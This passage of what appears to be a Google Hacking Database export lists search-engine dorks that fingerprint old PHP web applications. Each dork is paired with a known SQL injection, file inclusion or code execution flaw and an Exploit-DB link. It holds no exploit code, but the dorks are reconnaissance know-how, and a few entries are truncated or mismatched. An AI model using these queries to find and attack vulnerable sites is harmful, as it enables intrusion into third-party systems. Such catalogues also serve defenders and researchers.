Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+MercuryBoard%22", "shortDescription": "\"Powered by MercuryBoard\"", "textualDescription": "MercuryBoard 1.1.4 (User-Agent) Remote SQL Injection: http://www.exploit-db.com/exploits/2247" }, { "signatureReferenceNumber": "3485", "link": "https://www.exploit-db.com/ghdb/3485/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Drake+CMS%22+inurl:index.php%3Foption%3Dguestbook", "shortDescription": "\"Powered by Drake CMS\" inurl:index.php?option=guestbook", "textualDescription": "Drake CMS 0.4.11 Remote Blind SQL Injection - CVE: 2008-6475: http://www.exploit-db.com/exploits/5391" }, { "signatureReferenceNumber": "3486", "link": "https://www.exploit-db.com/ghdb/3486/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Driven+by+DokuWiki%22", "shortDescription": "\"Driven by DokuWiki\"", "textualDescription": "DokuWiki 2006-03-09b (dwpage.php) Remote Code Execution: http://www.exploit-db.com/exploits/2321" }, { "signatureReferenceNumber": "3487", "link": "https://www.exploit-db.com/ghdb/3487/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+php+update%22", "shortDescription": "\"powered by php update\"", "textualDescription": "PHP-Update 2.7 (admin/uploads.php) Remote Code Execution - CVE: 2006-6878: http://www.exploit-db.com/exploits/3020" }, { "signatureReferenceNumber": "3488", "link": "https://www.exploit-db.com/ghdb/3488/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+jaws%22+|+%22powered+by+the+jaws+project%22+|+inurl:%3Fgadget%3Dsearch", "shortDescription": "\"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search", "textualDescription": "Jaws 0.6.2 (Search gadget) Remote SQL Injection - CVE: 2006-3292: http://www.exploit-db.com/exploits/1946/" }, { "signatureReferenceNumber": "3489", "link": "https://www.exploit-db.com/ghdb/3489/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Realizzato+utilizzando+Web+Portal", "shortDescription": "Realizzato utilizzando Web Portal", "textualDescription": "WebPortal CMS 0.6-beta Remote Password Change - CVE: 2008-0142: http://www.exploit-db.com/exploits/4835" }, { "signatureReferenceNumber": "3491", "link": "https://www.exploit-db.com/ghdb/3491/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+ILIAS%22", "shortDescription": "\"powered by ILIAS\"", "textualDescription": "ILIAS LMS 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns: http://www.exploit-db.com/exploits/9151" }, { "signatureReferenceNumber": "3493", "link": "https://www.exploit-db.com/ghdb/3493/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+site+is+powered+by+CMS+Made+Simple%22", "shortDescription": "\"This site is powered by CMS Made Simple\"", "textualDescription": "CMS Made Simple 1.2.4 (FileManager module) File Upload - CVE: 2008-2267: http://www.exploit-db.com/exploits/5600" }, { "signatureReferenceNumber": "3494", "link": "https://www.exploit-db.com/ghdb/3494/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22FlatNuke%22+%22Valid+HTML+4.01!%22+%22Valid+CSS!%22+%22Get+RSS+2.0+Feed%22+%22Get+RSS", "shortDescription": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "textualDescription": "Flatnuke 2.5.8 file() Priv Escalation / Code Execution: http://www.exploit-db.com/exploits/2498" }, { "signatureReferenceNumber": "3495", "link": "https://www.exploit-db.com/ghdb/3495/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+BLOG:CMS%22|%22Powered+by+blogcms.com%22|%222003-2004,+Radek+Hul%C3%A1n%22", "shortDescription": "\"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hul\u00e1n\"", "textualDescription": "BLOG:CMS 4.0.0k Remote SQL Injection - CVE: 2006-3364: http://www.exploit-db.com/exploits/1960" }, { "signatureReferenceNumber": "3496", "link": "https://www.exploit-db.com/ghdb/3496/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Copyright+.+Nucleus+CMS+v3.22+.+Valid+XHTML+1.0+Strict+.+Valid+CSS+.+Back+to+top", "shortDescription": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top", "textualDescription": "Nucleus CMS 3.22 (DIR_LIBS) Arbitrary Remote Inclusion - CVE: 2006-2583: http://www.exploit-db.com/exploits/1816" }, { "signatureReferenceNumber": "3497", "link": "https://www.exploit-db.com/ghdb/3497/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22by+eXtreme+Crew%22", "shortDescription": "\"by eXtreme Crew\"", "textualDescription": "extreme-fusion 4.02 Remote Code Execution: http://www.exploit-db.com/exploits/2937" }, { "signatureReferenceNumber": "3498", "link": "https://www.exploit-db.com/ghdb/3498/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%222007+Rafal+Kucharski%22", "shortDescription": "\"2007 Rafal Kucharski\"", "textualDescription": "RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection - CVE: 2009-1910: http://www.exploit-db.com/exploits/8648" }, { "signatureReferenceNumber": "3499", "link": "https://www.exploit-db.com/ghdb/3499/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+forum+powered+by+Phorum.%22", "shortDescription": "\"This forum powered by Phorum.\"", "textualDescription": "Phorum 5 (pm.php) Arbitrary Local Inclusion - CVE: 2006-3611: http://www.exploit-db.com/exploits/2008" }, { "signatureReferenceNumber": "3500", "link": "https://www.exploit-db.com/ghdb/3500/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22is+proudly+powered+by+WordPress%22", "shortDescription": "\"is proudly powered by WordPress\"", "textualDescription": "Wordpress 2.0.6 wp-trackback.php Remote SQL Injection - CVE: 2007-0233: http://www.exploit-db.com/exploits/3109" }, { "signatureReferenceNumber": "3501", "link": "https://www.exploit-db.com/ghdb/3501/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Burning+Board+Lite+1.0.2+*+2001-2004%22", "shortDescription": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "textualDescription": "Woltlab Burning Board Lite 1.0.2 Blind SQL Injection: http://www.exploit-db.com/exploits/2842" }, { "signatureReferenceNumber": "3502", "link": "https://www.exploit-db.com/ghdb/3502/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=FhImage,+powered+by+Flash-here.com", "shortDescription": "FhImage, powered by Flash-here.com", "textualDescription": "Fhimage 1.2.1 Remote Command Execution: http://www.exploit-db.com/exploits/7821" }, { "signatureReferenceNumber": "3503", "link": "https://www.exploit-db.com/ghdb/3503/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22FlatNuke%22+%22Valid+HTML+4.01!%22+%22Valid+CSS!%22+%22Get+RSS+2.0+Feed%22+%22Get+RSS", "shortDescription": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "textualDescription": "Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users: http://www.exploit-db.com/exploits/2499" }, { "signatureReferenceNumber": "3504", "link": "https://www.exploit-db.com/ghdb/3504/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+blur6ex%22", "shortDescription": "\"powered by blur6ex\"", "textualDescription": "blur6ex 0.3.462 (ID) Admin Disclosure / Blind SQL Injection - CVE: 2006-3065: http://www.exploit-db.com/exploits/1904" }, { "signatureReferenceNumber": "3505", "link": "https://www.exploit-db.com/ghdb/3505/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Claroline%22+-demo", "shortDescription": "\"Powered by Claroline\" -demo", "textualDescription": "Claroline 1.7.4 (scormExport.inc.php) Remote Code Execution: http://www.exploit-db.com/exploits/1627" }, { "signatureReferenceNumber": "3508", "link": "https://www.exploit-db.com/ghdb/3508/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Burning+Board+Lite+1.0.2+*+2001-2004%22", "shortDescription": "\"Powered by Burning Board Lite 1.0.2 * 2001-2004\"", "textualDescription": "Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection - CVE: 2006-6237: http://www.exploit-db.com/exploits/2841" }, { "signatureReferenceNumber": "3510", "link": "https://www.exploit-db.com/ghdb/3510/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Personal+.NET+Portal%22", "shortDescription": "\"Personal .NET Portal\"", "textualDescription": "Personal.Net Portal Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15067" }, { "signatureReferenceNumber": "3511", "link": "https://www.exploit-db.com/ghdb/3511/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22SmodBIP%22+%26+%22Aktualno.ci%22", "shortDescription": "\"SmodBIP\" & \"Aktualno.ci\"", "textualDescription": "SmodBIP 1.06 (aktualnosci zoom) Remote SQL Injection - CVE: 2007-1920: http://www.exploit-db.com/exploits/3678" }, { "signatureReferenceNumber": "3512", "link": "https://www.exploit-db.com/ghdb/3512/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22SmodCMS%22+%26+%22S.ownik%22", "shortDescription": "\"SmodCMS\" & \"S.ownik\"", "textualDescription": "SmodCMS 2.10 (Slownik ssid) Remote SQL Injection - CVE: 2007-1931: http://www.exploit-db.com/exploits/3679" }, { "signatureReferenceNumber": "3513", "link": "https://www.exploit-db.com/ghdb/3513/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22is+a+product+of+Lussumo%22", "shortDescription": "\"is a product of Lussumo\"", "textualDescription": "Vanilla 1.1.3 Remote Blind SQL Injection - CVE: 2007-5643: http://www.exploit-db.com/exploits/4548" }, { "signatureReferenceNumber": "3514", "link": "https://www.exploit-db.com/ghdb/3514/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php%3Fname%3DPNphpBB2%22", "shortDescription": "inurl:\"index.php?name=PNphpBB2\"", "textualDescription": "PNphpBB2 1.2 (index.php c) Remote SQL Injection - CVE: 2007-3052: http://www.exploit-db.com/exploits/4026" }, { "signatureReferenceNumber": "3515", "link": "https://www.exploit-db.com/ghdb/3515/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22propuls%C3%A9+par+DotClear%22+%22fil+atom%22+%22fil+rss%22+%2Bcommentaires", "shortDescription": "\"propuls\u00e9 par DotClear\" \"fil atom\" \"fil rss\" +commentaires", "textualDescription": "DotClear 1.2.4 (prepend.php) Arbitrary Remote Inclusion - CVE: 2006-2866: http://www.exploit-db.com/exploits/1869" }, { "signatureReferenceNumber": "3516", "link": "https://www.exploit-db.com/ghdb/3516/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Online+Grades%22", "shortDescription": "\"Powered by Online Grades\"", "textualDescription": "Online Grades & Attendance 3.2.6 Credentials Changer SQL injection: http://www.exploit-db.com/exploits/8843" }, { "signatureReferenceNumber": "3517", "link": "https://www.exploit-db.com/ghdb/3517/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP+Photo+Album%22", "shortDescription": "\"Powered by PHP Photo Album\"", "textualDescription": "phpAlbum" }, { "signatureReferenceNumber": "3518", "link": "https://www.exploit-db.com/ghdb/3518/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ClanTiger%22", "shortDescription": "\"Powered by ClanTiger\"", "textualDescription": "ClanTiger 1.1.1 Multiple Cookie Handling Vulnerabilities: http://www.exploit-db.com/exploits/8471" }, { "signatureReferenceNumber": "3519", "link": "https://www.exploit-db.com/ghdb/3519/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Site+powered+by+GuppY%22+|+%22Site+cr%C3%A9%C3%A9+avec+GuppY%22+%2Binurl:lng%3D", "shortDescription": "\"Site powered by GuppY\" | \"Site cr\u00e9\u00e9 avec GuppY\" +inurl:lng=", "textualDescription": "GuppY 4.5.16 Remote Commands Execution - CVE: 2007-0639: http://www.exploit-db.com/exploits/3221" }, { "signatureReferenceNumber": "3520", "link": "https://www.exploit-db.com/ghdb/3520/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+php+photo+album%22+-demo2+-pitanje%22", "shortDescription": "\"powered by php photo album\" -demo2 -pitanje\"", "textualDescription": "PHP Album 0.3.2.3 Remote Command Execution: http://www.exploit-db.com/exploits/1678" }, { "signatureReferenceNumber": "3521", "link": "https://www.exploit-db.com/ghdb/3521/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/modules/lykos_reviews/", "shortDescription": "inurl:/modules/lykos_reviews/", "textualDescription": "XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection - CVE: 2007-1817: http://www.exploit-db.com/exploits/3618" }, { "signatureReferenceNumber": "3522", "link": "https://www.exploit-db.com/ghdb/3522/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+X7+Chat%22", "shortDescription": "\"Powered By X7 Chat\"", "textualDescription": "X7 Chat 2.0.4 (old_prefix) Remote Blind SQL Injection - CVE: 2006-3851: http://www.exploit-db.com/exploits/2068" }, { "signatureReferenceNumber": "3524", "link": "https://www.exploit-db.com/ghdb/3524/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+guestbook+script%22", "shortDescription": "\"powered by guestbook script\"", "textualDescription": "GuestBook Script 1.7 (include_files) Remote Code Execution: http://www.exploit-db.com/exploits/1575" }, { "signatureReferenceNumber": "3525", "link": "https://www.exploit-db.com/ghdb/3525/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=index.php%3Foption%3Dcom_ezine&", "shortDescription": "index.php?option=com_ezine", "textualDescription": "Joomla Component D4JeZine 2.8 Remote BLIND SQL Injection - CVE: 2007-1776: http://www.exploit-db.com/exploits/3590" }, { "signatureReferenceNumber": "3526", "link": "https://www.exploit-db.com/ghdb/3526/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+site+is+powered+by+e107%22|inurl:e107_plugins|e107_handlers|e107_files", "shortDescription": "\"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files", "textualDescription": "e107 0.75 (GLOBALS Overwrite) Remote Code Execution: http://www.exploit-db.com/exploits/2268" }, { "signatureReferenceNumber": "3529", "link": "https://www.exploit-db.com/ghdb/3529/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/modules/xfsection/", "shortDescription": "inurl:/modules/xfsection/", "textualDescription": "XOOPS Module XFsection 1.07 (articleid) BLIND SQL Injection - CVE: 2005-0725: http://www.exploit-db.com/exploits/3645" }, { "signatureReferenceNumber": "3530", "link": "https://www.exploit-db.com/ghdb/3530/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22phpwcms/index.php%3Fid%3D%22", "shortDescription": "inurl:\"phpwcms/index.php?id=\"", "textualDescription": "phpwcms 1.2.6 (Cookie: wcs_user_lang) Local File Include: http://www.exploit-db.com/exploits/2758" }, { "signatureReferenceNumber": "3531", "link": "https://www.exploit-db.com/ghdb/3531/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22This+site+is+using+phpGraphy%22+|+intitle:%22my+phpgraphy+site%22", "shortDescription": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "textualDescription": "PHPGraphy 0.9.12 Privilege Escalation / Commands Execution: http://www.exploit-db.com/exploits/2867" }, { "signatureReferenceNumber": "3532", "link": "https://www.exploit-db.com/ghdb/3532/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Copyright+Devellion+Limited+2005.+All+rights+reserved.%22", "shortDescription": "\"Copyright Devellion Limited 2005. All rights reserved.\"", "textualDescription": "CubeCart 3.0.11 (oid) Remote Blind SQL Injection - CVE: 2006-4267: http://www.exploit-db.com/exploits/2198" }, { "signatureReferenceNumber": "3533", "link": "https://www.exploit-db.com/ghdb/3533/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/modules/debaser/", "shortDescription": "inurl:/modules/debaser/", "textualDescription": "XOOPS Module debaser 0.92 (genre.php) BLIND SQL Injection- CVE: 2007-1805: http://www.exploit-db.com/exploits/3630" }, { "signatureReferenceNumber": "3534", "link": "https://www.exploit-db.com/ghdb/3534/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Quick.Cms%22", "shortDescription": "\"Powered by Quick.Cms\"", "textualDescription": "Quick.Cms.Lite 0.3 (Cookie sLanguage) Local File Include - CVE: 2006-5834: http://www.exploit-db.com/exploits/2719" }, { "signatureReferenceNumber": "3535", "link": "https://www.exploit-db.com/ghdb/3535/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/modules/rmgallery/", "shortDescription": "inurl:/modules/rmgallery/", "textualDescription": "XOOPS Module RM+Soft Gallery 1.0 BLIND SQL Injection - CVE: 2007-1806: http://www.exploit-db.com/exploits/3633" }, { "signatureReferenceNumber": "3536", "link": "https://www.exploit-db.com/ghdb/3536/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22", "shortDescription": "intext:\"2000-2001 The phpHeaven Team\"", "textualDescription": "phpMyChat 0.14.5 (SYS enter) Remote Code Execution: http://www.exploit-db.com/exploits/1646" }, { "signatureReferenceNumber": "3537", "link": "https://www.exploit-db.com/ghdb/3537/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Basado+en+Spirate%22", "shortDescription": "\"Basado en Spirate\"", "textualDescription": "Small Pirate v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4936: http://www.exploit-db.com/exploits/8819" }, { "signatureReferenceNumber": "3538", "link": "https://www.exploit-db.com/ghdb/3538/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22lists/%3Fp%3Dsubscribe%22+|+inurl:%22lists/index.php%3Fp%3Dsubscribe%22", "shortDescription": "inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"", "textualDescription": "PHPList 2.10.2 GLOBALS[] Remote Code Execution: http://www.exploit-db.com/exploits/1659" }, { "signatureReferenceNumber": "3539", "link": "https://www.exploit-db.com/ghdb/3539/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Barbecued+by+sNews%22", "shortDescription": "\"Barbecued by sNews\"", "textualDescription": "sNews 1.5.30 Remote Reset Admin Pass / Command Exec Exploit - CVE: 2007-0261: http://www.exploit-db.com/exploits/3116" }, { "signatureReferenceNumber": "3540", "link": "https://www.exploit-db.com/ghdb/3540/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22printable_pedigree.php%22", "shortDescription": "inurl:\"printable_pedigree.php\"", "textualDescription": "Dog Pedigree Online Database 1.0.1b Blind SQL Injection: http://www.exploit-db.com/exploits/8740" }, { "signatureReferenceNumber": "3542", "link": "https://www.exploit-db.com/ghdb/3542/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+discuz!", "shortDescription": "\"powered by discuz!", "textualDescription": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure: http://www.exploit-db.com/exploits/2859" }, { "signatureReferenceNumber": "3543", "link": "https://www.exploit-db.com/ghdb/3543/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+web+site+was+made+with+PostNuke%22", "shortDescription": "\"This web site was made with PostNuke\"", "textualDescription": "PostNuke 0.763 (PNSV lang) Remote Code Execution - CVE: 2006-5733: http://www.exploit-db.com/exploits/2707" }, { "signatureReferenceNumber": "3544", "link": "https://www.exploit-db.com/ghdb/3544/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=\"Powered by Shop-Script FREE\"", "shortDescription": "\"Powered by Shop-Script FREE\"", "textualDescription": "Shop-Script FREE 2.0 Remote Command Execution - CVE: 2007-4932: http://www.exploit-db.com/exploits/4419/" }, { "signatureReferenceNumber": "3545", "link": "https://www.exploit-db.com/ghdb/3545/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22LinPHA+Version+1.3.x%22+or+%22The+LinPHA+developers%22", "shortDescription": "\"LinPHA Version 1.3.x\" or \"The LinPHA developers\"", "textualDescription": "LinPHA 1.3.1 (new_images.php) Remote Blind SQL Injection - CVE: 2007-4053: http://www.exploit-db.com/exploits/4242/" }, { "signatureReferenceNumber": "3546", "link": "https://www.exploit-db.com/ghdb/3546/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+Quick.Cart%22", "shortDescription": "\"powered by Quick.Cart\"", "textualDescription": "Quick.Cart 2.0 (actions_client/gallery.php) Local File Include: \nhttp://www.exploit-db.com/exploits/2769" }, { "signatureReferenceNumber": "3549", "link": "https://www.exploit-db.com/ghdb/3549/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP-Update%22+-site:www.php-update.co.uk", "shortDescription": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "textualDescription": "PHP-Update 2.7 Multiple Remote Vulnerabilities - CVE: 2006-6879: \nhttp://www.exploit-db.com/exploits/3017" }, { "signatureReferenceNumber": "3550", "link": "https://www.exploit-db.com/ghdb/3550/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22+-sourceforge", "shortDescription": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "textualDescription": "phpMyChat 0.15.0dev (SYS enter) Remote Code Execution: \nhttp://www.exploit-db.com/exploits/1647" }, { "signatureReferenceNumber": "3551", "link": "https://www.exploit-db.com/ghdb/3551/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+MercuryBoard%22", "shortDescription": "\"Powered by MercuryBoard\"", "textualDescription": "MercuryBoard 1.1.5 (login.php) Remote Blind SQL Injection - CVE: 2008-6632: \nhttp://www.exploit-db.com/exploits/5653" }, { "signatureReferenceNumber": "3552", "link": "https://www.exploit-db.com/ghdb/3552/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Coppermine+Photo+Gallery%22", "shortDescription": "\"Powered by Coppermine Photo Gallery\"", "textualDescription": "Coppermine Photo Gallery 1.4.18 LFI / Remote Code Execution - CVE: 2008-3481: \nhttp://www.exploit-db.com/exploits/6178" }, { "signatureReferenceNumber": "3555", "link": "https://www.exploit-db.com/ghdb/3555/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Content+managed+by+the+Etomite+Content+Management+System%22", "shortDescription": "\"Content managed by the Etomite Content Management System\"", "textualDescription": "Etomite CMS 0.6.1 (username) SQL Injection - CVE: 2006-3904: \nhttp://www.exploit-db.com/exploits/2071" }, { "signatureReferenceNumber": "3556", "link": "https://www.exploit-db.com/ghdb/3556/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+PCPIN.com%22", "shortDescription": "\"powered by PCPIN.com\"", "textualDescription": "PCPIN Chat 5.0.4 (login/language) Remote Code Execution: \nhttp://www.exploit-db.com/exploits/1697" }, { "signatureReferenceNumber": "3557", "link": "https://www.exploit-db.com/ghdb/3557/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Leap%22", "shortDescription": "\"Powered by Leap\"", "textualDescription": "Leap CMS 0.1.4 (searchterm) Blind SQL Injection - CVE: 2009-1613: \nhttp://www.exploit-db.com/exploits/8576" }, { "signatureReferenceNumber": "3558", "link": "https://www.exploit-db.com/ghdb/3558/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22option%3Dcom_tophotelmodule%22", "shortDescription": "inurl:\"option=com_tophotelmodule\"", "textualDescription": "CVE: 2009-3368\nEDB-ID:\nThis search potentially exposes Joomla Hotel Booking System XSS/SQL Injection Vulnerabilities" }, { "signatureReferenceNumber": "3563", "link": "https://www.exploit-db.com/ghdb/3563/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Runcms+Copyright%22+%222002+-+2007%22+%2B%22page+created%22", "shortDescription": "\"Runcms Copyright\" \"2002 - 2007\" +\"page created\"", "textualDescription": "RunCms 1.5.2 (debug_show.php) Remote SQL Injection - CVE: 2007-2539: \nhttp://www.exploit-db.com/exploits/3850" }, { "signatureReferenceNumber": "3566", "link": "https://www.exploit-db.com/ghdb/3566/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+eXV2+Vers%22", "shortDescription": "\"Powered by eXV2 Vers\"", "textualDescription": "exV2 2.0.4.3 extract() Remote Command Execution - CVE: 2006-7080: \nhttp://www.exploit-db.com/exploits/2415" }, { "signatureReferenceNumber": "3567", "link": "https://www.exploit-db.com/ghdb/3567/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Betrieben+mit+Serendipity+1.0.3%22", "shortDescription": "\"Betrieben mit Serendipity 1.0.3\"", "textualDescription": "Serendipity 1.0.3 (comment.php) Local File Include - CVE: 2006-6242: \nhttp://www.exploit-db.com/exploits/2869" }, { "signatureReferenceNumber": "3569", "link": "https://www.exploit-db.com/ghdb/3569/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+XMB%22", "shortDescription": "\"Powered by XMB\"", "textualDescription": "XMB 1.9.6 Final basename() Remote Command Execution - CVE: 2006-4191: \nhttp://www.exploit-db.com/exploits/2178" }, { "signatureReferenceNumber": "3571", "link": "https://www.exploit-db.com/ghdb/3571/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+BIGACE%202.5%22", "shortDescription": "\"Powered by BIGACE 2.5\"", "textualDescription": "BIGACE CMS 2.5 (username) Remote SQL Injection - CVE: 2009-1778: \nhttp://www.exploit-db.com/exploits/8664" }, { "signatureReferenceNumber": "3573", "link": "https://www.exploit-db.com/ghdb/3573/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allintitle:powered+by+DeluxeBB", "shortDescription": "allintitle: powered by DeluxeBB", "textualDescription": "DeluxeBB 1.2 Multiple Remote Vulnerabilities - CVE: 2008-2195: \nhttp://www.exploit-db.com/exploits/5550" }, { "signatureReferenceNumber": "3574", "link": "https://www.exploit-db.com/ghdb/3574/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Online+Grades%22", "shortDescription": "\"Powered by Online Grades\"", "textualDescription": "Online Grades & Attendance 3.2.6 Blind SQL Injection - CVE: 2009-2598: \nhttp://www.exploit-db.com/exploits/8854" }, { "signatureReferenceNumber": "3576", "link": "https://www.exploit-db.com/ghdb/3576/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ClanTiger%22", "shortDescription": "\"Powered by ClanTiger\"", "textualDescription": "ClanTiger 1.1.1 (slug) Blind SQL Injection: http://www.exploit-db.com/exploits/8473" }, { "signatureReferenceNumber": "3577", "link": "https://www.exploit-db.com/ghdb/3577/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22AlumniServer+project%22", "shortDescription": "\"AlumniServer project\"", "textualDescription": "AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection: http://www.exploit-db.com/exploits/9020" }, { "signatureReferenceNumber": "3579", "link": "https://www.exploit-db.com/ghdb/3579/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+sendcard+-+an+advanced+PHP+e-card+program%22", "shortDescription": "\"Powered by sendcard - an advanced PHP e-card program\"", "textualDescription": "SendCard 3.4.0 Unauthorized Administrative Access: http://www.exploit-db.com/exploits/2117" }, { "signatureReferenceNumber": "3580", "link": "https://www.exploit-db.com/ghdb/3580/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:imageview5", "shortDescription": "inurl:imageview5", "textualDescription": "Imageview 5 (Cookie/index.php) Remote Local Include - CVE: 2006-5554: \nhttp://www.exploit-db.com/exploits/2647" }, { "signatureReferenceNumber": "3581", "link": "https://www.exploit-db.com/ghdb/3581/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+site+is+powered+by+e107%22", "shortDescription": "\"This site is powered by e107\"", "textualDescription": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602: \nhttp://www.exploit-db.com/exploits/2711" }, { "signatureReferenceNumber": "3582", "link": "https://www.exploit-db.com/ghdb/3582/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+tikiwiki%22", "shortDescription": "\"powered by tikiwiki\"", "textualDescription": "TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602: \nhttp://www.exploit-db.com/exploits/2288" }, { "signatureReferenceNumber": "3584", "link": "https://www.exploit-db.com/ghdb/3584/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+is+a+Free+%26+Open+Source+mailing+list+manager%22", "shortDescription": "\"This is a Free & Open Source mailing list manager\"", "textualDescription": "Open Newsletter" }, { 